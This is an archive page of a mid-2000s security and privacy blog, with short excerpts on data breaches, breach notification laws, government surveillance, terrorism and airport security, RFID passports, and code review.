There’s been a great deal of talk around the London plot about the impact of the destruction of ten airliners. Senior US officials called it inconceivable. Now, destroying 10 planes might be murder on the scale of 9/11. It would certainly be shocking and despicable. I’d like to point out that the Iraqi people can […]

 

Mangle those cell phones?

OK. Right off I am *not* advocating physical destruction of old recycled cell phones. This post (Mangle those hard drives!) at my primary security blog, ThreatChaos, got a lot of reactions when I suggested that physical destruction of hard drives was the best policy in lieu of a well managed data wiping process. That was […]

 

On Terror and Terrorism

“Is There Still a Terrorist Threat” asks Foreign Affairs. Bruce Schneier considers “What the Terrorists Want,” and also offers up a useful roundup of “Details on The British Terrorist Alert.” In that details space, Phil offers up thoughts on what a “Temporary Flight Restriction” meant to his travel. Meanwhile Kung-Fu Monkey asks “Wait, Aren’t You […]

 

Blog finds

I’ve come across some blogs I find interesting. Maybe others will, too. Statistical Modeling, Causal Inference, and Social Science Weblog of a Syrian Diplomat in America Decision Science News Social Science Data and Software (SSDS) Blog SecuritySauce (Marty “Snort” Roesch’s blog) Plus, a special bonus non-blog: UCSB’s Cylinder Preservation and Digitization Project

 

Outsiders! Insiders! Let's call the whole thing off.

I have no idea whether outsiders or insiders are responsible for more losses, and while the topic is somewhat interesting, it seems to me to be something of a marketing-generated distraction. I’ve worked in environments where I am absolutely certain that insiders were the predominant threat, in environments where they probably were, and in environments […]

 

Nasty, Poor, Brutish and Short: Somalia

Life in Somalia seems truly awful, and, like Hobbes, many are willing to turn to a very powerful government to fix it. See Ethan Zuckerman’s “Somalia Update,” which points to “The Path to Ruin” in the Economist.

 

An Odd IDology

So over at the “ID Space,” jdancu (who I assume is John) writes some responses to questions I posted to Kim Cameron’s blog. The article is “Knowledge Verification In Practice…” Kim also has a response, “Law of Minimal Disclosure or Norlin’s Maxim?” Since this is part of a continuing conversation, let me summarize by stating […]

 

Who's next?

                            Now that ISS has been purchased by IBM? Or is consolidation not really happening?

 

Nick Szabo is on a Roll

When I started blogging, I wanted to say one interesting and insightful thing per day. I still do, and so say several things in the hopes that one of them is interesting. Nick Szabo, on the other hand, has apparently been storing them up, and is on a roll lately: “Book consciousness,” on the effects […]

 
 

AOL data release fallout

AOL’s CTO has “decided to leave” the company, “effective immediately”, according to an email message sent to remaining employees by CEO Jon Miller. Additionally, CNet news reports that the researcher who posted the data, and the researcher’s supervisor (a direct report of ex-CTO Maureen Govern) have been fired.

 

Biometrics Enable Guilty Men to Go Free?

Don’t miss the picture that Jerry Fishenden paints in “biometrics: enabling guilty men to go free? Further adventures from the law of unintended consequences:” Outside, armed policemen, guard dogs and riot barriers prevent the curious crowds pushing too close. On the office rooftops – police marksmen. In the Victorian drains below the courtroom – boiler-suited […]

 

Ed Moyle is on a Roll

“Why’s Everybody Pissed at Consumer Reports?” and “Thoughts About OpenOffice” are both great posts.

 

Ruling issued in NSA wiretap case

The Permanent Injunction of the TSP requested by Plaintiffs is granted inasmuch as each of the factors required to be met to sustain such an injunction have undisputedly been met. The irreparable injury necessary to warrant injunctive relief is clear, as the First and Fourth Amendment rights of Plaintiffs are violated by the TSP. See […]

 

Birthday paradox bites FEMA

Via the SacBee: WASHINGTON (AP) – FEMA will replace locks on as many as 118,000 trailers used by Gulf Coast hurricane victims after discovering the same key could open many of the mobile homes. One locksmith cut only 50 different kinds of keys for the trailers sold to FEMA, officials said Monday The article continues: […]

 

Clue me in?

I have to fly (from PDX to MDW) Sunday AM. Anybody flown domestically who can tell me what the real-world impact of the new rules has been in terms of delays at security? As Leslie NielsenLloyd Bridges might say “I picked the wrong four days to go on vacation”. Updated: Lloyd, not Leslie. Thanks, Asteroid.

 

Marketing Points Fingers

Over at the CSO blog “Brand Loyalty Hinges On Security,” we learn that: In 2005, more than 52 million account records were reportedly stolen or misplaced, according to a study by CMO Council and Opinion Research. … “Security is what I call the 800-pound gorilla of reputation,” Jeffrey Resnick, EVP and global managing director of […]

 

Ryan Russel, A Sample Please

Over at the Open Source Vulnerability Database blog, we learn that Ryan Russel has won the “Oldest Vulnerability Contest.” It is in the interests of science that I ask how Mr. Russel was able to come from behind like this. And much as I like and respect Mr. Russel, it’s quite a last minute leap […]

 

Airline Threats: Nothing to Fear Except Fear Itself

I’m glad to hear that they caught a set of people with real plans and capabilities to carry out an act of mass murder. Too many of the recent groups arrested have fit better into the “round up some suspects” line of thinking. I don’t have a lot to add to FDR’s fine words, but […]

 
 

Performing Code Reviews

My co-worker Mike Howard has a really good article on “A Process for Performing Security Code Reviews” in IEEE Security & Privacy. It’s chock full of useful advice.

 

Attack of the Clones?

EKR is the voice of reason when he points out that of course RFID passports are clonable, when he responds to all the press brouhaha about, Lukas Grunwald’s demonstration at Black Hat showing that an RFID passport can be duplicated using off the shelf parts. This outcome is hardly surprising, this is yet another side […]

 

AOL search records 'research'

Most readers will have read by now of America Online publicly releasing a large sample of search records. From the README supplied with the data: The data set includes {AnonID, Query, QueryTime, ItemRank, ClickURL}. AnonID – an anonymous user ID number. Query – the query issued by the user, case shifted with most punctuation removed. […]

 

Emerging from Network Black Holes

Sorry about the downtime. The fine folks who host this blog for us have been having hardware troubles. They’re swapping components around, and we hope it all heals up soon. Photo: Waiting to Breathe, from Stock.xchng.

 

Dear Sandman Hotel, Vancouver

Thanks for understanding that after a day and a half hiking through Garibaldi Provincial Park, all I want is a quiet room that doesn’t cost an arm and a leg, and a shower. At first I shuddered at having a room between the elevators and the ice machine, but it was quiet as a tomb. […]

 

RSS vulnerable?

Well, yeah. Of course. The perfect storm for a new wave of attacks: 1. New protocol catching on fast that involves completely trusting clients. 2. Insecure servers maintained by inexpereinced sys-admins. 3. A vulnerable RSS reader tied directly to the OS. (Can you say IE7.0?) A report out of SpiDynamics at BlackHat this week: Attackers […]

 

The butler did it

There’s a feeling you get when you watch a formulaic movie. After seeing a half-hour’s worth, you just know how it will end. You can see the decision points characters reach, and you know they’ll make the bad choice. Indeed, the very predictability of such films is what allows hilarious parodies such as Airplane! or […]

 

More thoughts on blogging

Thanks for the kind introduction Adam. This has been an interesting summer as I reach out to various security bloggers. I hope my “Meet The Bloggers” podcast series will help people to get to know the various “personalities” out there. We are an interesting bunch. The one question I have for everyone, bloggers and blog […]

 

The Down Side of "Strong" Authentication

Brad Stone has a great article in Wired about his car being stolen and the insurance company insisting that he must be lying because he still had all of his fancy RFID enabled keys. This assumption that the security system is perfect is going to continue to bite consumers especially as banks move to two-factor […]

 

Introducing Richard Stiennon

I’m pleased to introduce the Jazz Combo’s first actual rocket scientist guest blogger, Richard Stiennon. Before founding IT Harvest, a startup dedicated to re-inventing IT research, Richard worked at Gartner and PriceWaterHouseCoopers. He usually blogs at Threat Chaos, and was kind enough to feature Chris and I as his first podcast, in Meet The Security […]

 

Yet Another Coding Standard?

Over at Matasano, Tom Ptacek skewers the new CERT Secure Programming Standard by asking: Do We Need an ISO Secure Coding Standard?. The entire article is well worth reading, but it sums up nicely with this: There are already a myriad of good sources of information about secure programming, including books targeted specifically to developers […]

 

Indiana's Breach Law

Indiana’s breach notification law went into effect on July 1, 2006. An excerpt relevant the “lost laptop” phenomenon: Sec. 2. (a) As used in this chapter, “breach of the security of the system” means unauthorized acquisition of computerized data that compromises the security, confidentiality, or integrity of personal information maintained by a state or local […]

 

It's Getting Worse All The Time?

So there’s a post over at F-Secure’s blog: There’s a growing trend here. We’ve been saying for some time that the lack of large virus outbreaks is evidence that the malware environment could be getting worse, not better. The bad guys want to make money – not make attention. So as a malware author, if […]

 

On Provable Security

Eric Rescorla writes: Koblitz and Menezes are at it again. Back in 2004, they published Another Look at “Provable Security” arguing that the reduction proofs that are de rigeur for new cryptosystems don’t add much security value. (See here for a summary.) Last week, K&M returned to the topic with Another Look at “Provable Security” […]

 

Sky Marshalls Have Suspicious Behavior Quotas?

The air marshals, whose identities are being concealed, told 7NEWS that they’re required to submit at least one report a month. If they don’t, there’s no raise, no bonus, no awards and no special assignments. Even better, the people who are “suspicious” are put into secret databases with no way to find out why their […]

 

I don't know if this or the 'White Pages' breach is worse

Via America’s Finest News Source: Postmaster General Loses Laptop; Zip-Code Data Of Millions At Risk July 25, 2006 | Issue 42•30 WASHINGTON, DC—The U.S. Postal Service has confirmed that a laptop computer issued to Postmaster General John Potter and containing the zip-code information of over 280 million Americans was allegedly left in a taxicab Monday […]

 

"Privacy" International

As mentioned by Ben Laurie; Simon Davies, the Director of Privacy International, was quoted in IT Weeks’s Will industry rescue the identity card? as saying: “I’ve believed for some months that a ‘white knight’ consortium from industry is needed,” Davies said. “Companies that can see the benefits of the ID card idea should approach the […]

 

Usable Security: SOUPS Blog posts

There are about twenty good posts talking about the Symposium on Usable Security and Privacy (SOUPS) over at Ka-Ping Yee’s Usable Security blog. If you’re reading this in the archives, start here and go forward, or here and go back. Some favorites: How will the scourge really be killed? (Panel) Decision Strategies and Susceptibility to […]

 

I smell a movement

No, not that kind, silly. I just read over at Bejtlich’s blog, that he has decided to start NoVA Sec, having been inspired by Chisec, which was begun by Matasano honcho Thomas Ptacek. ChiSec is fun, and has been rapidly imitated by other Matasano folks, yielding Seasec and NYsec (I’m hoping it will go next […]

 

Church 2.0

Check out Benjamin Sternke’s “Church 2.0: Emergence/Chaos theory.” Itn’s an interesting examination of how churches need to evolve to respond to a different type of parishoner: Church 2.0 will leave room for the Holy Spirit in its planning and structuring and strategizing. She’ll leave room for happy accidents to emerge. She’ll be patient with chaos, […]

 

Buggy Advice from Adam

So in the “Code Review Guidelines” which I wrote a long time back, I quote a bit of code by Peter Guttmann, on how to open a file securely. Last week, Ilja van Sprundel got in touch with me, and said that the lstat/open/fstat chain is insecure, because you can recycle inodes by creating a […]

 

ACLU: Feds snooping on Fedwire?

Press release describes a FOIA request seeking info on governmental surveillance of Fedwire, among other programs. This would be troubling. It is difficult to overstate the extent to which the Federal Reserve System values its reputation for ethical behavior and fair play. A reputation, I might add, that based on my observations it deserves.

 

Actual Data Sharing!

Cruising through my blogroll this morning over the morning coffee, I came across an article from BeyondSecurity, which walks through a forensics analysis of an on going security incident. This is a good read and it’s great to see folks in the industry talking about what they actually do and how they do it. Thanks […]

 

SMS to Email?

I’m looking for a service that will give me a US phone number capable of accepting SMS messages, and forwarding those messages to an email account. I’m happy to pay for the service, but my searches have come up blank. I don’t want a service where the user has to add the destination email manually. […]

 

Job Hunting for Security Executives

Like everyone, there comes a time in every CSOs career where they need to look for a new job. I’ve reached that point in my career and in looking around, I’ve run into several challenges. The first problem I’ve found is that there are a lot of different titles for the person who owns all […]

 

North Carolina is in the club

From North Carolina’s breach notification law, which took effect on December 1, 2005: (f) In the event a business provides notice to more than 1,000 persons at one time pursuant to this section, the business shall notify, without unreasonable delay, the Consumer Protection Division of the Attorney General’s Office and all consumer reporting agencies that […]

 

Choicepoint Spins off 3 Businesses

From their press release: ALPHARETTA, Ga., July 10 /PRNewswire-FirstCall/ — ChoicePoint (NYSE: CPS – News) today announced its intent to divest various businesses resulting from its company-wide strategic review. The previously disclosed review process resulted in the company adopting a new strategic focus on helping customers manage economic or physical risks, as well as the […]

 

CSI/FBI Survey considered harmful

The latest 2006 CSI-FBI Computer Crime and Security Survey has been released. Already, it is making waves, as it does each year. I want to simply state that there is no reason to give this survey any credence. The survey instrument is sent only to CSI members. This time, it was sent to 5,000 of […]

 

In every dream home, a heartache

Barry Ritholz, an NYC hedge fund manager, blogs about a WSJ story. The gist: On Sept. 21, 2001, rescuers dug through the smoldering remains of the World Trade Center. Across town, families buried two firefighters found a week earlier. At Fort Drum, on the edge of New York’s Adirondacks, soldiers readied for deployment halfway across […]

 

Skype reverse-engineered?

According to Charlie Paglee, Skype has been cracked, and a compatible client implemented. This promises to have wide ramifications, about which Charlie writes at length.

 

ThreatChaos Podcast Featuring Emergent Chaos

This week marks the first installment of a series of podcasts I am producing called “Meet The Security Bloggers”. I asked Adam Shostack and Chris Walsh to be the guinea pigs for the first one and it turned out really well. These guys write for EmergentChaos, a blog that Adam started. When he got it […]

 

Belated happy birthday

…to the United States’ Freedom of Information Act, a national law signed on July 4, 1966, by a reluctant Lyndon Johnson, after having been championed by U.S. Representative John Moss.

 

Debian CVS server compromised

Here’s news of a breach that (I presume) involved no PII, but which could be significant. I wrote about a previous Debian breach back in December, 2003. I hadn’t realized it had been so long! Update: Local vuln used to elevate privs. Local access gained due to weak developer password. Details here.

 

Spying As a "Lifestyle Choice"

“The Plot to Hijack Your Computer” in Business Week lays out some of the history of “Direct Revenue,” a spyware company whose products are so beloved of their customers that DR receives regular death threats. Cryptome presents an except from a complaint in a lawsuit against AT&T, claiming that “NSA/AT&T Spying Began 8 Months beofre […]

 

Bye, Syd

Syd Barrett has died.

 

Enforcement

People whine about Sarbanes-Oxley as if it were government accountants with a sense of neither humor nor proportion watching everything an executive does, 24/7. Thing is, much of the actual regulation is courtesy of the Public Company Accounting Oversight Board, a private corporation. My hat is off to the accounting profession, which successfully met an […]

 

Chivalry isn't dead

Regarding the theft of Coca Cola intellectual property and its attempted sale to arch-rival Pepsico, we learn PepsiCo was offered a new product sample and confidential documents in May, in a letter from someone calling himself ‘Dirk’. But instead of taking the bait it tipped off Coca-Cola, which brought in the FBI. […] Coca-Cola’s chairman […]

 
 

In Congress Assembled, July 4, 1776

In CONGRESS, July 4, 1776 The unanimous Declaration of the thirteen united States of America, When in the Course of human events, it becomes necessary for one people to dissolve the political bands which have connected them with another, and to assume among the powers of the earth, the separate and equal station to which […]

 

Sorry for not posting this earlier…

…but my internet tube was flooded. If you want to know what the heck that means, the good folks at 27B Stroke 6 (easily the best blog name I’ve seen this year), provide the details. The short and sweet is that U.S. senator Ted Stevens ain’t exactly Vint Cerf: I just the other day got, […]

 

Flippin' sweet!

Maybe IBM does have a sense of humor. “Knock it off, Napoleon! Just make yourself a dang quesa-dilluh!”. This phrase, from the movie Napoleon Dynamite, is the cipher key IBM are using to publish encrypted XML at this year’s Wimbledon grand slam. But is this a rather glaring lapse in security, or simply an anticipatory […]

 
 

Questions about 'Ignoring The "Great Firewall of China"'

Later today at the Privacy Enhancing Technologies workshop, , Richard Clayton will be presenting a talk on “Ignoring the Great Firewall of China.” I’ll be the ‘session chair’ for the session, which usually means I make sure the speaker is in the room, has some slides on a computer, and knows how much time they […]

 

Indistinguishable from magic

The press relase you won’t see. For Immediate Release CATAWBA COUNTY SCHOOL SYSTEM, June 26 — The Catawba County Public School System (NC) announced today that district web site administrators have remedied a configuration error which accidentally resulted in the social security numbers and names of several hundred students being made available via the popular […]

 

Breach Roundup: 6/17 – 6/24

This week’s roundup is large. Rather than push other newish posts off the bottom of most people’s screens, it has been deemed preferable to prepend this introductory paragraph, at the bottom of which readers may elect to see more.

 

Gartner to Google: Learn to read minds

Concerning a school district which misconfigured its web server and wound up posting student social security numbers for all — including Google’s spiders — to see, Gartner’s Avivah Litan weighs in: They say the Internet is free and open, and you can’t stop them,” Litan said. “But they ought to scrutinize some of the content […]

 

SWIFT spies

The United States Treasury Department has had secret access to records maintained as part of the SWIFT system, which it has been using secretly for years to identify financial ties to terrorist entities. The Washington Post has more.

 

The FBI's Use of Data Brokers

Although the federal government and local law enforcement agencies nationwide use private data brokers, the FBI said that practices used by these companies to gather private phone records without warrants or subpoenas is illegal, according to an Associated Press article on Chron.com. A senior FBI lawyer, Elaine N. Lammert, told lawmakers the bureau was still […]

 

Background Checks for Chemists, Too?

Is something a little off balance when we background check people trying to learn about computer security, but not chemists or nucular physicists?

 
 

Metricon: The Agenda

Andrew Jaquith has posted the Metricon Agenda. We had a lot of good papers, and couldn’t accept them all. (We’ll provide, umm, numbers, at the workshop.) If you’ve submitted a paper, you should have heard back by now. Thanks to all the submitters, and we look forward to seeing you at the workshop.

 

Men Without Pants

To protect the rights of the official beer they were denied entry, so the male fans promptly removed the trousers and watched the game in underpants. The BBC asserts that up to 1,000 fans were told to strip off their orange pants in “Fans Lose Trousers to Gain Entry.” Markus Siegler, the control-freak in charge […]

 

Remembering the Maine

From Maine’s Public Law, Chapter 583, passed April 2006: Sec. 9. 10 MRSA §1348, sub-§5, as enacted by PL 2005, c. 379, §1 and affected by §4, is amended to read: 5 . Notification to state regulators. When notice of a breach of the security of the system is required under subsection 1, the information […]

 

Breach Roundup

Expedia/Ernst & Young, 250,000 CC, Lost Laptop. Ed Hasbrouck has a great analysis of Expedia’s privacy policy at “Expedia auditors lose laptop with customer credit card numbers.” Japanese Telco KDDI, 4million names, address, phone numbers, mechanism unknown. “KDDI Suffers Massive Data Leak.” Why is a Japanese telco owning up? New expectations. AIG (American Insurance Group), […]

 

Breach Quickies

Well, now that America’s Finest News Source is getting into breach coverage, I guess I can move on. See “Hotels.com Information Stolen” in the Onion. Also, Nick Owen has some good analysis of the Ohio State comedy of errors in “Repurcussions of data loss at Ohio University.” I’m hoping Chris will cover the N+1 Ohio […]

 

Dear News Media,

Recently, you had a very interesting story on your web site. I left a browser tab open, so I could read it on the plane. But your very interesting story meta-refreshed itself so you could serve me more ads. Then the airport’s wireless portal showed up, and it stopped refreshing. And I couldn’t read your […]

 

Boycott Sivacracy!

I have a proposal for all British and American faculty who care about global justice: Please boycott me. Siva Vaidhyanathan asks that we boycott him in “A Modest Proposal: Boycott me.” I think its the best response I’ve seen to the British boycott of Israeli academics.

 

80% of Active Duty Military, 2.2 million SSNs

Social Security numbers and other personal information for as many as 2.2 million U.S. military personnel — including nearly 80 percent of the active-duty force — were among the data stolen from the home of a Department of Veterans Affairs analyst last month, federal officials said yesterday, raising concerns about national security as well as […]

 

Is encryption worth it?

Gartner’s Avivah Levitan says it’s better to spend money on encryption than on cleaning up after a data breach, according to a news report on her recent testimony before the US Senate. The problem? Gartner’s method in researching this claim, as best I can tell, relies on looking at a few high-profile cases. Sure, if […]

 
 

Breach Roundup

Where two organizations are implicated, the first is the one which collected the data, the second is Ernst and Young the one that lost it. Texas Guaranteed Student Loan/Hummingbird, 1.3m SSNs, “lost equipment.” “Toronto firm at centre of security breach” Hotels.com/Ernst and Young, 243,000 credit cards, lost laptop. “Hotels.com customer info may be at risk” […]

 

Jurisdiction as Property

Nick Szabo has a fascinating article on “Jurisdiction as property and peer-to-peer government.” I’m not going to attempt to summarize it, but will simply quote the opening: Modern civics and political science is often taught as an absurd dichotomy: that government is a “monopoly over the use of force” and that the absence of government […]

 

ID Theft and the 18-24 Set

Matt Rose has an interesting post, “What is Higher Education’s Role in Regards to ID Theft?:” A recent study by the US Justice Department notes that households headed by individuals between the ages of 18 and 24 are the most likely to experience identity theft. The report does not investigate why this age group is […]

 

EU Courts Rule Against PNR Sharing with USA

The European Court has ruled the US/EU treaty on data sharing around air travelers is not legal. (I’m not saying “about air travelers” because I read Ed Hasbrouck, and thus know that PNRs contain data on more than just the travelers.) That’s not why I’m posting. I’m posting because of this choice quote from the […]

 

Words of Wisdom

We live in a society of laws. Why do you think I took you to all those “Police Academy” movies? For fun? Well, I didn’t hear anybody laughin’, did you? — Homer Simpson Marge Be Not Proud

 

(Adam In Seattle)

I’m in Seattle this week for some work-related stuff, and have some free evenings. If you’re in Seattle and would like to get together, drop me a note.

 

Maybe they can borrow a few million from the IRS

[T]he VA’s inspector general, George Opfer, said that the agency had been unable to formally notify the affected veterans because “we don’t have 26 million envelopes.” via the Bradenton Herald Now that the funny part is out of the way… Asked the cost for preventing and covering potential losses from identity theft, [VA Secretary] Nicholson […]

 

Illinois credit freeze now law

Public Law 094-0799 now allows Illinois residents to have a freeze applied to their credit reports. The maximum fee (not applicable to those 65 and over) is $10.00. The law, according to a press release from the governor’s office, takes effect January 1, 2006. Look for other states to continue to pile on, now that […]

 
 

A small, but hopeful sign in state breach legislation

A bill sits on Illinois governor Rod Blagojevich’s desk. If he signs it, Illinois will take a step toward meaningful central reporting of breach notifications: 5 (815 ILCS 530/25 new) 6 Sec. 25. Annual reporting. Any State agency that collects 7 personal data and has had a breach of security of the system 8 data […]

 

Never say die?

I’m not sure what to expect out of this story of a guy who, left behind in a crazed state and presumed to have died, overnighted above 8000 meters on Everest and was found alive the next day, prompting a rescue effort expected to take three days. (Note that this is a different climber from […]

 

Make that 12% of Adults

Rob Lemos convinces me that the better number is “One in 8 (or 9) Americans.” I buy his statement as long as we discuss adults, rather than Americans. Kids are at risk from ID theft, too, even if this incident doesn’t touch them. (Assuming none of the vets has an overlapping SSN, a stolen SSN, […]

 

"Encryption is hard, let's go shopping!"

On upcoming changes to the Payment Card Industry Data Security Standard: “Today, the requirement is to make all information unreadable wherever it is stored,” Maxwell said. But this encryption requirement is causing so much trouble for merchants that credit card companies are having trouble dealing with requests for alternative measures, he said. In response, changes […]

 

Blogrolling Kim Cameron

I’ve added Kim Cameron’s Identity Blog to the blogroll. There’s a great post “Inebriation and the Laws of Identity” about what happens to you when you’re not firm and resolved about when you hand over your ID. Hint to Paul Toal: The data is used for fraud prevention, and will stay in their databases forever. […]

 
 

The Human Element

In one of the soon-to-be countless articles about the VA Incident, Network World’s Ellen Messmer writes: The sad irony in all this is that there are many at the VA who have worked hard to design and install network-based security. But in the “multiple layers of security” everyone is so fond of discussing, the human […]

 

Restaurant Recommendation: Queen Sheba, Seattle

Not only was the Ethiopian food at Queen Sheba quite good, but when I went back, they had my jacket, and my somewhat expensive camera was still in the pocket. Doubly recommended. Queen Sheba is at 916 East John St, a block from Broadway, 206-322-0852. Thanks to W. for introducing me. [Updated to fix spelling. […]

 

Personal Data on 26,500,000 Veterans Stolen (Including SSNs)

Personal data, including Social Security numbers of 26.5 million U.S. veterans, was stolen from a Veterans Affairs employee this month after he took the information home without authorization, the department said Monday. The material represents personal data of all living veterans who served and have been discharged since 1976, according to the department. The information […]

 

911 Dispatcher Kills Woman by Abusing Database

An emotionally disturbed 911 emergency dispatcher abused his access to the call center’s databases while tracking his ex-girlfriend and her new boyfriend before murdering both of them. See Declan McCullagh, “Police Blotter: 911 dispatcher misuses database, kills ex-girlfriend,” which covers the court case stemming from a 2003 shooting, described in “Job loss tied to fatal […]

 

Breach round-up

Ohio University I: On Friday, April 21, the FBI advised the Technology Transfer Department at Ohio University’s Innovation Center that a server containing office files had been compromised. Data on the server included e-mails, patent and intellectual property files, and 35 Social Security numbers associated with parking passes. Ohio University II: 300,000 alums and friends. […]

 

Homeland Security Privacy Office Slams RFID

Via Kim Cameron (“Homeland Security Privacy Office Slams RFID Technology“), I read about “The Use of RFID for Human Identification.” This is an important report. The money quote is useful because it comes out of DHS: Against these small incremental benefits of RFID are arrayed a large number of privacy concerns. RFID deployments’ digitally communicated […]

 

President Bush Calls for National ID Card

[Bush] also proposed to cut back on potential fraud by creating an identification card system for foreign workers that would include digitized fingerprints. He said that a tamperproof identification card for workers would “leave employers with no excuse” for violating the law. Of course, that means the rest of us will need the cards, too, […]

 

The Internet Channel, at Risk

Lack of trust in online banking among U.S. consumers is a serious constraint because of doubts about banks’ security measures, according to eMarketer’s new report, “Online Banking: Remote Channels, Remote Relationships?” The result is a slowing rate of adoption, with online banking households increasing by only 3.1% in the last quarter of 2005 — the […]

 

An Apollo Program for our times

Teach Florida’s alligators to feed on sharks. Unfortunately, this would deprive CNN of much of its material, so they will oppose it strenuously.

 

US reporters under surveillance

Looks like the Bush administration is tracking reporters’ phone calls. Also, the FBI admits that it uses the Patriot Act to obtain journalists’ phone records in an attempt to determine to whom they have been speaking. Read more here and here, from an ABC News reporter who has received some “attention” from the government. Photo: […]

 
 

That didn't take long

Verizon is facing a $5 billion lawsuit over its alleged law-breaking. The NYT reports today that this suit may actually involve as much as $50 billion in damage. Previously, a $20 billion suit had been filed regarding the aspects of the NSA program that had become publicly-known in December. Interestingly enough, when you don’t take […]

 

Tip of the iceberg

A former intelligence officer for the National Security Agency said Thursday he plans to tell Senate staffers next week that unlawful activity occurred at the agency under the supervision of Gen. Michael Hayden beyond what has been publicly reported, while hinting that it might have involved the illegal use of space-based satellites and systems to […]

 

Metricon

Because of the lack of proceedings, we have removed the no-dual-submission rule. That is, work submitted elsewhere is ok. Best: Submit a short position paper or description of work done/ongoing. Your submission must be no longer than five(5) paragraphs or presentation slides. Author names and affiliations should appear first in/on the submission. Submissions may be […]

 

Cell phone records market seemingly no longer important?

Massachusetts Congressman Ed Markey asks Dennis Hastert whether legislation protecting mobile phone users’ privacy has been sent to a “legislative ‘Guantanamo Bay’” in order to modify it so that intelligence gathering activities analogous to those affecting land lines would be unimpeded.

 

Data Surveillance Workshop

On June 3, 2006 Harvard University’s Center for Research on Computation and Society will hold a day-long workshop on Data Surveillance and Privacy Protection. Although there has been significant public attention to the civil liberties issues of data surveillance over the past few years, there has been little discussion of the actual techniques that could […]

 

On "Feds' Watch List Eats Its Own"

Ryan Singel opens an excellent article “Feds’ Watch List Easts Its Own,” with a pertinent question. The article is worth reading for its enumeration of how the watch list catches senior military and State Department officials, who also can’t get off the list. It opens: What do you say about an airline screening system that […]

 

Comments

Oops. My bad, I’d turned off comments on a bunch of posts. I think its fixed.

 

Free At Last!

“The United States said on Friday it had flown five Chinese Muslim men who had been held at the Guantanamo Bay prison to resettle in Albania, declining to send them back to China because they might face persecution. The State Department said Albania accepted the five ethnic Uighurs — including two whose quest for freedom […]

 

Code Name: Miranda

I admit it, probably ten or more years ago I actually signed up for a supermarket affinity card. Of course, I promptly lost it during the great migration to the suburbs, and for a good while I would simply claim to have left it at home and the cashier would cheerfully use a “store card”, […]

 

The Costs of Torture

I usually try to cut down quotes. This essay by Siva Vaidhyanathan in Slate’s Altercation is worth quoting at length: I was wondering something. Maybe somebody could help me out here. Yesterday a federal jury decided appropriately that this country shall not execute Zacarias Moussaoui, a wanna-be-mass murderer who also happens to be a mentally […]

 

Automated code scanners do have their uses

Slashdot is carrying the story of a rather large bug find in the X11 code. Judging by the patch, it looks like the problem was due to a lack of caffeine: if (getuid() == 0 || geteuid != 0) The OpenBSD code auditors seem to have found this one independently: This is one of those […]

 

Time to Patch

Brian Krebs has a long article, “Time To Patch III: Apple,” examining how long it takes Apple to ship security fixes: Over the past several months, Security Fix published data showing how long it took Microsoft and Mozilla to issue updates for security flaws. Today, I’d like to present some data I compiled that looks […]

 

Security Breach Roundup

State of Ohio, 7.7 million registered voter SSNs, dismal process. From “Ohio Recalls Voter Registration CDs” via Dataloss. Fifth Third Bank employee Marco Antonio Munoz, 74 pages of names of victims, dismal dependance on process, from “Internal theft of personal bank data rare,” in the Cadilac News. Someone’s PR department deserves a bonus for that […]

 

DoD Tricare Management Activity system, SSNs, credit card numbers, health info, 14K people

Via Army Times: The Pentagon said routine monitoring of the Tricare Management Activity’s public servers on April 5 resulted in the discovery of an intrusion and that the personal records had been compromised, leaving open the possibility of identity theft among the members affected. The information contained in the files varied and investigators do not […]

 

Live Free or Die: New Hampshire Rejects National ID

Be it Enacted by the Senate and House of Representatives in General Court convened: Prohibition Against Participation in National Identification System. The general court finds that the public policy established by Congress in the Real ID Act of 2005, Public Law 109-13, is contrary and repugnant to Articles 1 through 10 of the New Hampshire […]

 

aetna insurance,38K customers, names+SSNs, health info, stolen laptop

Report via Reuters. Aetna declined to to say where this occurred or which law-enforcement agency they are working with, but it looks like the employer whose folks just got their PII exposed was the US Department of Defense. Stars and Stripes has the scuttlebutt from HQ: The laptop was stolen from an employee’s personal car […]

 

Purdue University, 1351 applicants+students, SSNs, "unauthorized electronic access"

“Unauthorized electronic access”. Not sure if that’s a poorly configured web server, or what. Press release today. Happened in February. Notices sent at some unspecified time. Indiana only requires state agencies to disclose breaches, the law isn’t in effect yet, and the legislative and judicial departments aren’t considered state agencies. Quoth “Mark Smith, head and […]

 

Tony Chor on Presenting at MIX

Tony Chor has a good post on “Backstage at MIX06.” The effort that goes into a good presentation, including the practice, the extra machines, the people to keep them in sync, etc, is really impressive: Normally, when I do a presentation and demo, both the demos and the presentation are on the same machine. I […]

 

Slippery Slope, Gaping Chasm and Torture

In February of last year, I told you about Lester Eugene Siler, a Tennessee man who was literally tortured by five sheriff’s deputies in Campbell County, Tennessee who suspected him of selling drugs. The only reason we know Siler was tortured is because his wife had the good sense to start a recording device about […]

 

Bin Laden Tape

Walid Phares summarizes the new Bin Laden tape at “New Bin Laden Tape: Ten Main Points,” and analyzes it in “Bin Laden’s ‘State of the Jihad’ Speech:” One more time Al Jazeera pomotes an Usama Bin Laden speech. After airing portions of the Bin Laden audiotape al Jazeera posted large fragments of the “speech” on […]

 

Man Charged For Notifying USC of Vulnerability

Federal prosecutors charged a San Diego-based computer expert on Thursday with breaching the security of a database server at the University of Southern California last June and accessing confidential student data. A statement from the U.S. Attorney for the Central District of California names 25-year-old Eric McCarty as the person who contacted SecurityFocus last June […]

 

Homo Economicus?

Researchers have identified brain cells involved in economic choice behavior: The scientists, who reported the findings in the journal Nature, located the neurons in an area of the brain known as the orbitofrontal cortex (OFC) while studying macaque monkeys which had to choose between different flavours and quantities of juices. They correlated the animals’ choices […]

 

Have the Terrorists Won?

On Wednesday, officials closed down all security checkpoints at the Hartsfield-Jackson Atlanta International Aiport when a “suspicious device” was detected in a screening machine. … All departing flights were stopped, and arriving flights were delayed 90 minutes, affecting 120 flights during the day’s peak travel time, according to the Associated Press. However, after two hours, […]

 

Imagine

I second Alec Muffett’s recommendation of ThePartyParty. In particular, the cover of Imagine is dumbfoundingly bittersweet. Happy Earth Day. [Image: NASA]

 

Statistics

In the latest in the ongoing saga of debit cards being reissued after a breach at an unnamed merchant, 3rd-party, or card processor, we learn that unless a crook stands a chance of getting caught, he’ll keep on stealing: These crooks get away with it, and that’s why they keep doing it. They’ve got about […]

 

Vengeful God Hurts Those With Demands

I forgot to blog this at the time, so will simply say that “Long-Awaited Medical Study Questions the Power of Prayer,” as reported in the NY Times and elsewhere, demonstrates that if there is a god, he prefers those who help themselves.

 

The law is an ass

